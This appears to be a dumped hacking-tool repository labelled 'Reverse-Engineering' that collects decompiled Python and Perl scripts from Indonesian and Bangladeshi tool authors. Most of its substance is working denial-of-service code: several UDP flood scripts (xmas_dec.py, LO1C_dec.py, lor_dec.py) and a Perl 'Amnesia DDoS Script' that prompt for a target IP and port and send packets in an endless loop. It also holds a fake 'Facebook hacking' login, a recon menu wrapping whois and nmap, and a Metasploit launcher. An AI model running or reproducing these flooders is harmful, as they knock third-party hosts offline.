├── Ddos404 ├── Hi ├── README.md ├── xmas_dec.py ├── hackfb2019_dec.py ├── Amnesia.py ├── LO1C_dec.py ├── lor_dec.py ├── ufosyn_dec.py ├── smurf_dec.py ├── ddos.sh ├── andromeda_dec.py ├── win.32.64.Nt_dec.py └── Botnet_dec.py ├── roc-x ├── hi ├── README.md ├── ms_opt_dec.py ├── bdsms.py ├── emailtool_dec.py ├── a1.py ├── t_dec.py ├── kali2.py └── ddos_dec.py ├── All Cloning Tool ├── hi ├── x4web_dec.py ├── bhot_dec.py ├── bat_dec.py ├── W-Login_dec.py ├── famous_dec.py ├── mr-unknown_dec .py └── boss_dec.py ├── X4 Not found ├── hi ├── enpy-base32_dec.py ├── enpy-base64_dec.py └── encrypt_base16_dec.py ├── Black Mafia ├── hi ├── all in one main_dec.py ├── Gmail attack_dec.py ├── comile_dec.py └── time pass_dec.py ├── Nabill-Official ├── Abir └── a.py └── README.md /Ddos404/Hi: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /roc-x/hi: -------------------------------------------------------------------------------- 1 | boys 2 | -------------------------------------------------------------------------------- /All Cloning Tool/hi: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Ddos404/README.md: -------------------------------------------------------------------------------- 1 | # Ddos404 -------------------------------------------------------------------------------- /X4 Not found/hi: -------------------------------------------------------------------------------- 1 | zhhsbbs 2 | -------------------------------------------------------------------------------- /Black Mafia/hi: -------------------------------------------------------------------------------- 1 | Darkxploit 2 | -------------------------------------------------------------------------------- /Nabill-Official/Abir: -------------------------------------------------------------------------------- 1 | Bznsnns 2 | -------------------------------------------------------------------------------- /Black Mafia/all in one main_dec.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/darkhunter141/Reverse-Engineering/HEAD/Black Mafia/all in one main_dec.py -------------------------------------------------------------------------------- /roc-x/README.md: -------------------------------------------------------------------------------- 1 | Commands For First Time: 2 | 3 | pkg update -y && pkg upgrade -y 4 | 5 | pkg install python -y 6 | 7 | pkg install git -y 8 | 9 | git clone https://github.com/RootOfCyber/roc-x 10 | 11 | Commands For All Time: 12 | 13 | cd roc-x 14 | 15 | python main.py . 16 | 17 | . . . . . . 18 | 19 | We Are On : 20 | 21 | Youtube: 22 | 23 | https://www.youtube.com/c/RootOfCyber 24 | 25 | Facebook: 26 | 27 | https://www.facebook.com/RootOfCyber 28 | 29 | What's app: 30 | 31 | https://chat.whatsapp.com/JPTOWlsJhhgEVtzht4tAlr 32 | 33 | Telegram: 34 | 35 | https://t.me/joinchat/JruEd1OzoFJDq9fBlh-Jkg 36 | 37 | Contact Us: 38 | 39 | rootofcyber@gmail.com -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Reverse--Engineering 2 | 💁 3 | 4 | 5 |

If you see this and you copy it, give me credit😶

6 | 7 |

🖥️ Contact Info

8 |
  • Our Facebook Page
  • 9 |
  • Our Facebook Community
  • 10 |
  • Our Youtube Channel
  • 11 |
  • Our Blogsite
  • 12 | 13 |
    14 |

    🤠 Devolopers :

    15 |
  • Ashrafi Abir (DarkXploit)
  • 16 |
  • Tanvir Mahamud Shariful (DarkWlof)
  • 17 | 18 | 19 | -------------------------------------------------------------------------------- /Ddos404/xmas_dec.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 3.7.4 2 | # Python bytecode 2.7 3 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25) 4 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/ 5 | # Embedded file name: 6 | import sys, os, time, socket, random 7 | from datetime import datetime 8 | now = datetime.now() 9 | hour = now.hour 10 | minute = now.minute 11 | day = now.day 12 | month = now.month 13 | year = now.year 14 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 15 | bytes = random._urandom(1490) 16 | os.system('clear') 17 | os.system('figlet POD') 18 | print 19 | print '\x1b[32;1m<=======================================>' 20 | print '\x1b[34;1m||========>PING OF DEADHT<=========||' 21 | print '\x1b[32;1m<=======================================>' 22 | print 'RECODE=Mrlinkerrorsystem' 23 | print 24 | ip = raw_input('MASUKAN IP TAGET ===> ') 25 | port = input('Port ===> ') 26 | os.system('clear') 27 | os.system('figlet Loading..') 28 | print 'membutuhkan waktu 5 detik' 29 | time.sleep(5) 30 | sent = 0 31 | while True: 32 | sock.sendto(bytes, (ip, port)) 33 | sent = sent + 1000000000 34 | port = port + 0 35 | print '\x1b[31;1mMengirim %s packet ke %s throught port:%s' % (sent, ip, port) 36 | if port == 65534: 37 | port = 0 -------------------------------------------------------------------------------- /Ddos404/hackfb2019_dec.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 3.7.4 2 | # Python bytecode 2.7 3 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25) 4 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/ 5 | # Embedded file name: 6 | import os, sys 7 | print "\n SELAMAT DATANG\n DI\n TOOLS MRLINKERRORSYSTEM\n CODE: BY MRLINKERRORSYSTEM\n FACEBOOK HACKING SYSTEM FAST CRACK \n _____ _ _\n| ___|_ _ ___ ___| |__ ___ ___ | | __\n| |_ / _` |/ __/ _ \\ '_ \\ / _ \\ / _ \\| |/ /\n| _| (_| | (_| __/ |_) | (_) | (_) | <\n|_| \\__,_|\\___\\___|_.__/ \\___/ \\___/|_|\\_\\ " 8 | print '\x1b[1;33mSudah punya ID dan Password nya?' 9 | print '\x1b[1;32mSilahkan Login ' 10 | import os, sys 11 | 12 | def wa(): 13 | os.system('xdg-open https://api.whatsapp.com/send?phone=6281249281196&text=Assalamualaikum') 14 | 15 | 16 | def restart(): 17 | ngulang = sys.executable 18 | os.execl(ngulang, ngulang, *sys.argv) 19 | 20 | 21 | user = raw_input('ID: ') 22 | import getpass 23 | sandi = raw_input('Password: ') 24 | if sandi == 'ganteng' and user == 'Mrlink': 25 | print 'Kamu Telah Login System Saya' 26 | sys.exit 27 | else: 28 | print 'Login GAGAL, Silahkan hubungi Saya' 29 | wa() 30 | restart() -------------------------------------------------------------------------------- /All Cloning Tool/x4web_dec.py: -------------------------------------------------------------------------------- 1 | from os import system as oss 2 | import sys 3 | import time 4 | def logo(): 5 | oss('toilet -f mono12 -F gay "X4WEB"') 6 | logo() 7 | head = """Author : Rakib Hossain 8 | 9 | Github : https://www.github.com/teamx4ck 10 | 11 | Facebook : X4ck cyber army 12 | 13 | Fb page : Team X4CK 14 | """ 15 | print(head) 16 | time.sleep(0.5) 17 | def opt(): 18 | print('[1] Whois Scan') 19 | print('[2] NSLookup') 20 | print('[3] Nmap') 21 | print('[4] Page link dump') 22 | print('[5] Join Facebook') 23 | print('[6] More Tools') 24 | print('[0] Exit') 25 | opt() 26 | print() 27 | opt = int(input('Enter your option : ')) 28 | if opt==1: 29 | oss('clear') 30 | logo() 31 | whurl = str(input('Enter domain name : ')) 32 | print('Please wait.....') 33 | time.sleep(0.5) 34 | oss('whois '+whurl) 35 | input('Press enter.....') 36 | oss('python x4web.py') 37 | elif opt==2: 38 | oss('clear') 39 | logo() 40 | nsurl = str(input('Enter domain name : ')) 41 | oss('nslookup '+nsurl) 42 | input('Press Enter.....') 43 | oss('python x4web.py') 44 | elif opt==3: 45 | oss('clear') 46 | logo() 47 | nm = input('Enter ip : ') 48 | oss('nmap '+ip) 49 | input('Press enter......') 50 | oss('python x4web.py') 51 | elif opt==4: 52 | oss('clear') 53 | logo() 54 | pgurl = str(input('Enter url : ')) 55 | oss('lynx -listonly -nonumbers -dump '+pgurl) 56 | input('Press enter......') 57 | oss('python x4web.py') 58 | elif opt==5: 59 | oss('xdg-open https://www.facebook.com/groups/x4ckcyberarmy/?ref=share') 60 | oss('python x4web.py') 61 | elif opt==6: 62 | oss('xdg-open https://www.github.com/teamx4ck') 63 | oss('python x4web.py') 64 | elif opt==0: 65 | print('Good day..') 66 | sys.exit() 67 | else: 68 | print('option not found...!') 69 | time.sleep(2) 70 | oss('python x4web.py') 71 | -------------------------------------------------------------------------------- /Ddos404/Amnesia.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use IO::Socket; 4 | 5 | ### 6 | # Amnesia DDoS Script 7 | ### 8 | system("clear || cls"); 9 | #It forgets... 10 | print q{ 11 | (`-') _ <-. (`-') <-. (`-')_ (`-') _ (`-').-> _ (`-') _ 12 | (OO ).-/ \(OO )_ \( OO) ) ( OO).-/ ( OO)_ (_) (OO ).-/ 13 | / ,---. ,--./ ,-.),--./ ,--/ (,------.(_)--\_) ,-(`-')/ ,---. 14 | | \ /`.\ | `.' || \ | | | .---'/ _ / | ( OO)| \ /`.\ 15 | '-'|_.' || |'.'| || . '| |)(| '--. \_..`--. | | )'-'|_.' | 16 | (| .-. || | | || |\ | | .--' .-._) \(| |_/(| .-. | 17 | | | | || | | || | \ | | `---.\ / | |'->| | | | 18 | `--' `--'`--' `--'`--' `--' `------' `-----' `--' `--' `--' 19 | print "\n------------------------------"; 20 | print "\n The IP you want to hit with Amnesia:"; 21 | chop ($host = ); 22 | print "==============================="; 23 | print "\n The Port that'll forget: "; 24 | chop ($port = ); 25 | print "==============================="; 26 | print "\n The Protocol (TCP or UDP):"; 27 | chop ($proto = ); 28 | system("clear || cls"); 29 | print "\n[*][$host] Is being hit with Amnesia on port [$port] via proto => [$proto] Protocol\n\n"; 30 | sleep 1; 31 | 32 | { 33 | $sock = IO::Socket::INET->new ( 34 | PeerAddr => $host, 35 | PeerPort => $port, 36 | Proto => "$proto" ) || die "\n [$host] Will now forget"; 37 | 38 | 39 | } 40 | packets: 41 | while (1) { 42 | $size = rand() * 8921811 * 99919998; 43 | print (" Packets sent: $size\n"); 44 | send($sock, 999999999999999999999999999, $size); 45 | packets2: 46 | $size = rand() * 8921873 * 99919988 * 2; 47 | print "Forgetting:"; 48 | send($sock, 999999999999999999999999999, $size); 49 | packet3: 50 | $size = rand() * 8921873 * 99919988 * 2 + 99919988; 51 | print " (=>$host:$port~$proto<=)"; 52 | send($sock, $size, $size); 53 | 54 | } 55 | 56 | 57 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /Ddos404/LO1C_dec.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 3.7.4 2 | # Python bytecode 2.7 3 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25) 4 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/ 5 | # Embedded file name: 6 | import sys, os, time, socket, random 7 | from datetime import datetime 8 | now = datetime.now() 9 | hour = now.hour 10 | minute = now.minute 11 | day = now.day 12 | month = now.month 13 | year = now.year 14 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 15 | bytes = random._urandom(1490) 16 | os.system('clear') 17 | os.system('figlet LOIC') 18 | print 19 | print '\x1b[31;1m\n `/ymMMMMMMMMMMMMMMmy/`\n /hMMMMMMMMMMMMMMMMMMMMMMh/\n /mMMmNMMMMMNNNNNNNNMMMMMNNMMm/\n `hNmo:dMMNNNmNNmNNmNNmNNNMMd:omNh`\n .mh:+/hMNNNNmNNmNdhmmNNmNNNNMy/o:hm.\n `d+://sNmMMMmMMMmdy+/mMMMmMMMmNs///+d`\n ys.o/oMmNNNmNNMNNMmdMNNMNNmNNNmMo/o.ys\n`my.-/NmMMMMmMMNmNNyyNNmNMMmMMMMmN/:`ym`\n-h/+s/MmMMMNmNNNdym++mymNNNmNMMNmM:so/h-\n-N.o.sMmMMMNh/:-`-Mo\x1b[37;1msM-`-:/hNMMMmMs.+.N-\n`ho/-ohmMMMM/ -M/+M. /MMMMmho-/oh\n s+-s-odmNNN` /-:/ .NNNmd+:s-+s\n `mo/-:+ymMm mMms+:-/om`\n .h/+/y`hhs yyh`y/+/h.\n `hd/::-+. .+-::/dy`\n /hs+/::.-- --.::/+sh:\n :hds+/-` `-/+sdh:\n `/ymM+ oMmy/' 20 | print '\x1b[32;1m<=======================================>' 21 | print '\x1b[34;1m||========>LON ORBIT LOW CANON<=========||' 22 | print '\x1b[32;1m<=======================================>' 23 | print 'RECODE=Mrlinkerrorsystem' 24 | print 25 | ip = raw_input('MASUKAN IP TAGET ===> ') 26 | port = input('Port ===> ') 27 | os.system('clear') 28 | os.system('figlet Loading..') 29 | print 'membutuhkan waktu 5 detik' 30 | time.sleep(5) 31 | sent = 0 32 | while True: 33 | sock.sendto(bytes, (ip, port)) 34 | sent = sent + 1000000000 35 | port = port + 0 36 | print '\x1b[32;1mMengirim %s packet ke %s throught port:%s' % (sent, ip, port) 37 | if port == 65534: 38 | port = 0 -------------------------------------------------------------------------------- /roc-x/ms_opt_dec.py: -------------------------------------------------------------------------------- 1 | import os,sys 2 | os.system("clear") 3 | import smtplib 4 | import time 5 | 6 | 7 | #CVALUE 8 | blue= '\33[94m' 9 | lightblue = '\033[94m' 10 | red = '\033[91m' 11 | white = '\33[97m' 12 | yellow = '\33[93m' 13 | green = '\033[1;32m' 14 | cyan = "\033[96m" 15 | end = '\033[0m' 16 | line=yellow+"======================================================================================================================" 17 | space=" " 18 | logo=red+str(""" 19 | 8888888b. .d88888b. .d8888b. Y88b d88P 20 | 888 Y88b d88P" "Y88b d88P Y88b Y88b d88P 21 | 888 888 888 888 888 888 Y88o88P 22 | 888 d88P 888 888 888 888888 Y888P 23 | 8888888P" 888 888 888 888888 d888b 24 | 888 T88b 888 888 888 888 d88888b 25 | 888 T88b Y88b. .d88P Y88b d88P d88P Y88b 26 | 888 T88b "Y88888P" "Y8888P" d88P Y88b 27 | """) 28 | 29 | 30 | #HEADER 31 | text=cyan+"\t\tDeveloped By : Sanaur Asif"+green+"\n\n\t\t★★ ROC-X MetaSploit★★ \n" 32 | notice="" 33 | def header(): 34 | print(logo) 35 | print(text) 36 | print(line) 37 | print(notice) 38 | 39 | 40 | header() 41 | print(cyan+"\n\t\t[•] Checking The Requirements") 42 | time.sleep(0.7) 43 | try: 44 | import time 45 | except: 46 | os.system("clear") 47 | header() 48 | print(cyan+"\n [°] Installing The Requirements. Allow Up to 10 minutes ") 49 | time.sleep(2) 50 | os.system("clear") 51 | notice=cyan+"\t\t[°] Installing The Requirements.. \n" 52 | header() 53 | notice="" 54 | print("\n") 55 | os.system("pip install ") 56 | 57 | 58 | os.system('clear') 59 | header() 60 | print(red+"\n\n [!] "+red+"NOTE : "+cyan+" You Have To Install Kali NetHunter in order to Run This Service\n "+red+"[!] "+cyan+"Otherwise, you will get an error while start it.\n\n") 61 | lastly=str(input(blue+" [>] Have You Installed Kali NetHunter ? [y/n] : "+yellow )) 62 | if lastly=="Y" or lastly=="y" or lastly=="yes" or lastly=="YES": 63 | os.system("python3 ms.py") 64 | else: 65 | os.system("python3 main2.py") 66 | -------------------------------------------------------------------------------- /Ddos404/lor_dec.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 3.7.4 2 | # Python bytecode 2.7 3 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25) 4 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/ 5 | # Embedded file name: 6 | import sys, os, time, socket, random 7 | from datetime import datetime 8 | now = datetime.now() 9 | hour = now.hour 10 | minute = now.minute 11 | day = now.day 12 | month = now.month 13 | year = now.year 14 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 15 | bytes = random._urandom(1490) 16 | os.system('clear') 17 | os.system('figlet LORIS') 18 | print '\x1b[32;1m . .IIIII .II\n IIIIIIIIII. I II . II..IIII-V.1.5-IIIIIIIII\n . .IIIIII II IIIIIIIIIIIIIIIIIIIII I.\n .IIIII.IIIII IIIByIII-II+Errorsystem+III"\n .IIIIIIII II .IIIII IIIIIIIIIIII. I\n IIIIII IIII I III+DDOS+IIII I\n .II IIIIIIIIIIIII IIIIIIIII\n I. .II+ATTACK+II I II I\n .IIII IIIIIIIIIIII . I\n IIIII. IIIIII . I.\n +HACKING+ IIIII ..I II .\n IIIIIII IIII... IIII\n IIII III. I IIBPCII\n III I I III\n II I .\n I LORIS \n' 19 | print '\x1b[32;1m<=======================================>' 20 | print '\x1b[34;1m||========>LORIS<=========||' 21 | print '\x1b[32;1m<=======================================>' 22 | print 'RECODE=mrlinkerrorsystem' 23 | print 24 | ip = raw_input('MASUKAN IP TAGET ===> ') 25 | port = input('Port ===> ') 26 | os.system('clear') 27 | os.system('figlet Loading..') 28 | print 'membutuhkan waktu 5 detik' 29 | time.sleep(5) 30 | sent = 0 31 | while True: 32 | sock.sendto(bytes, (ip, port)) 33 | sent = sent + 1000000000000000000L 34 | port = port + 0 35 | print '\x1b[32;1mMengirim %s packet ke %s throught port:%s' % (sent, ip, port) 36 | if port == 65534: 37 | port = 0 -------------------------------------------------------------------------------- /X4 Not found/enpy-base32_dec.py: -------------------------------------------------------------------------------- 1 | # Decompiled By DarkXploit 2 | # Author Team Dark Hunter 141 3 | # Github : https://github.com/darkhunter141 4 | # If If you see this and you copy it, give me credit# uncompyle6 version 3.7.4 5 | # Python bytecode 2.7 6 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25) 7 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/ 8 | # Embedded file name: